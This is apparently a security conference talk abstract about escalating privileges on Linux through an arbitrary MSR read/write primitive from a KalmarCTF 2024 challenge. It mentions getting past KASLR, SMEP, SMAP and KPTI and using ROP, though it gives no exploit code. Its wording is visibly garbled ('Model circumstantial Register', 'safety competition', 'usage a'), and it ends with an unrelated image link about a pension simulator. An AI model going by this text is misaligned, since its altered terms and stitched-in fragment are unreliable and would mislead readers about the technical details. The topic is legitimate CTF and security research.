In this talk we will see how we can exploit linux kernel to escalate privileges if we had an arbitrary MSR (Model circumstantial Register) read/write capability on X86 CPUs which was given to us on a "Msrable" challenge from KalmarCTF 2024 safety competition. If you have heard about "MSREXEC", this talk would show you how we would exploit a akin vulnerability, if we always find it on Linux.
This won't be specified a trivial task, since the kernel is having KASLR, SMEP, SMAP and KPTI safety mitigations, which will be explained during the talk. In the end, we will find a way to bypass SMAP (actually, without disabling it in CR4!) and usage a return-oriented-programming (ROP) exploitation method to escalate our privileges.
More: https://confidence-conference.org/
![HackYeah 2025: Tomasz Jedynak - Symulator emerytalny - Task Teaser [ZUS]](https://i1.ytimg.com/vi/pQt8JTTSpPI/maxresdefault.jpg)
